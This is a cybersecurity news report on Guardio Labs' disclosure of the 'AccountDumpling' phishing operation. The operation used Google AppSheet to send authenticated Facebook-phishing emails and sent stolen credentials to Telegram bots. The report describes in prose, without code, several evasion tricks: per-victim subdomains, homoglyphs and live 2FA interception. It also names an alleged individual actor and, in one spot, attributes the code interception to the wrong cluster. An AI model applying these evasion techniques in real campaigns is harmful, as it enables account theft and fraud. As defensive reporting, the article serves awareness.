A sophisticated Vietnamese-linked phishing operation dubbed “AccountDumpling” has compromised more than 30,000 Facebook accounts by exploiting Google’s AppSheet platform as an authenticated email relay, creating phishing messages that bypassed spam filters and appeared completely legitimate to victims.
Guardio Labs security researcher Shaked Chen publicly disclosed the operation on April 29, 2026, revealing one of the most technically advanced Facebook account-hijacking campaigns ever documented.
Unlike conventional phishing attacks that rely on spoofed sender addresses and shady SMTP servers, AccountDumpling weaponizes Google AppSheet, a legitimate no-code app builder, to send phishing emails from noreply@appsheet.com through appsheet.bounces.google.com.
The result: every message fully passed SPF, DKIM, and DMARC authentication checks, making them indistinguishable from trusted Google communications to both email clients and security tools. The scheme is not just a phishing campaign; it is a criminal supply chain.
Stolen Facebook credentials are funneled in real time to Telegram bots, after which compromised accounts are resold through a storefront operated by the same threat actors who stole them. In a particularly cynical twist, the operation also offers “account recovery” services to the very victims it defrauded.
Four Attack Clusters, One Target
Guardio mapped four distinct attack clusters, each using different social engineering lures but sharing the same Google-authenticated delivery infrastructure.
- Cluster A – Netlify-hosted fake Facebook Help Center: Victims received urgent DMCA or policy-violation warnings and were redirected to fake Facebook appeal pages on Netlify. Each victim received a unique subdomain to evade URL blocklists. These pages collected not just usernames and passwords but also dates of birth, phone numbers, and photos of government-issued IDs, enabling full identity takeover.
- Cluster B – Vercel-hosted “Blue Badge” reward traps: Instead of threats, this cluster offered rewards: fake blue-badge verifications, advertiser bonuses, and account checkups. Pages on Vercel included fake reCAPTCHA, countdown timers, anti-debugging scripts, and language localization across 30+ languages. Cyrillic homoglyphs replaced Latin characters in brand names to defeat string-based detection.
- Cluster C – Google Drive PDF with live operator control: This was the most technically advanced vector. Victims clicked a Google Drive link containing a Canva-generated PDF with an embedded redirect to a Socket.IO-based phishing panel. The panel gave a live human operator real-time WebSocket control over the victim’s session, capable of injecting incorrect password responses, collecting 2FA codes, and capturing browser screenshots via html2canvas.
- Cluster D Fake recruiter impersonation: Emails impersonated recruiters from Meta, WhatsApp, Adobe, Apple, and Ray-Ban. Rather than directing victims to a phishing page, attackers initiated conversations that shifted to attacker-controlled channels, building trust gradually before extracting credentials.
Inside the Telegram C2 Infrastructure
Across Clusters A and B, Guardio identified four Telegram bots wired into the credential exfiltration pipeline. Bot tokens and chat IDs were hidden in obfuscated JavaScript using hex-escaped constants, but researchers decoded the configuration and traced the data flows directly into private Telegram channels.
Victim record counts recovered from bot channel metadata totaled approximately 30,000 compromised accounts: roughly 2,900 from Bot-1, 11,000 from Bot-3, 4,000 from Bot-4, and 12,000 from a revoked Bot-2 channel.
Geographic analysis of the Bot-1 dataset found that 68.6% of victims were located in the United States, followed by Italy, Canada, the Philippines, India, Spain, Australia, the UK, Brazil, and Mexico, with over 50 countries represented.
Victim follow-ups confirmed account lockouts, business disruptions, credit card fraud, and significant financial losses, indicating that stolen PII was further circulated to dark-market buyers.
The investigation’s clearest attribution break came from a metadata oversight in Cluster C’s Google Drive PDF. Because the file was generated in Canva, the platform automatically embedded the creator’s account name in the /Author field, revealing a real Vietnamese name: Phạm Tài Tân.
Researchers quickly located a corresponding Facebook profile and a public-facing business website advertising Facebook “account unlocking” and “security” services.
Further corroborating evidence included Vietnamese-language developer comments in Cluster A’s HTML and Cluster B’s JavaScript, campaign timing consistent with Vietnam Standard Time working hours, and Telegram bot names carrying Vietnamese phonetic traces, including @tichxanhglobal_bot, where “Tích Xanh” translates to “blue checkmark” in Vietnamese.
A secondary signature, “Gatto Sazio,” found in newer Netlify serverless variants, suggests a separate kit developer, pointing to the operation’s modular structure: one actor builds the kit, another runs the campaign, and a third monetizes the stolen access.
AccountDumpling is a landmark case because it exposes a fundamental weakness in email authentication frameworks. SPF, DKIM, and DMARC were designed to verify the sending platform, not the trustworthiness of the message content, and attackers have learned to exploit that gap at an industrial scale.
KnowBe4 Threat Labs separately reported that on a single day in April 2025, over 10% of all global phishing emails it blocked were sent from AppSheet, confirming this is not an isolated technique but an evolving industry-wide abuse vector.
The operation’s monetization loop harvests credentials, hijacks accounts, sells access, and offers paid recovery, transforming stolen social media accounts into tradable commodities that fuel disinformation, fake storefronts, and identity laundering.
Guardio confirmed that additional Vietnamese-linked attack clusters tied to the same infrastructure are currently being analyzed and will be disclosed in future publications.
Indicators and Mitigation
Organizations and individual users can reduce exposure by taking the following steps:
- Verify all Meta-related emails by logging into Facebook directly, rather than clicking email links, regardless of the sender’s domain
- Treat noreply@appsheet.com emails about Meta or Facebook as suspicious unless you have an active AppSheet integration
- Enable Facebook’s advanced security features, including login alerts and trusted contacts, to limit the damage of credential theft
- Implement phishing-resistant MFA (hardware keys or passkeys) rather than SMS or TOTP codes, which Cluster B actively intercepted in real time
- Audit third-party no-code platforms in your organization for misconfigured notification workflows that could be abused as relay points
FAQ
Q1: How did the AccountDumpling phishing emails pass all spam filters?
Attackers abused Google AppSheet’s legitimate notification system, meaning emails were sent from Google’s own infrastructure (noreply@appsheet.com) and passed SPF, DKIM, and DMARC authentication signals that verify the sending platform, not the message’s intent.
Q2: What data did the attackers steal beyond passwords?
Beyond usernames and passwords, the phishing pages harvested dates of birth, phone numbers, government-issued ID photos, 2FA codes, and live browser screenshots, giving attackers everything needed to bypass platform recovery safeguards.
Q3: How were the stolen Facebook accounts monetized?
Compromised accounts were sold through an illicit storefront operated by the same threat actors, who also offered fake “account recovery” services to victims, creating a closed criminal-commercial loop that profited from both the theft and its aftermath.
Q4: Who is behind AccountDumpling?
Guardio Labs attributed the core operation to a Vietnamese-linked actor identified through PDF metadata containing the name Phạm Tài Tân, corroborated by Vietnamese-language code artifacts, Vietnam Standard Time activity patterns, and Telegram bot naming conventions.
Site: thecybrdef.com
For more insights and updates, follow us on Google News, Twitter, and LinkedIn.
About the Author
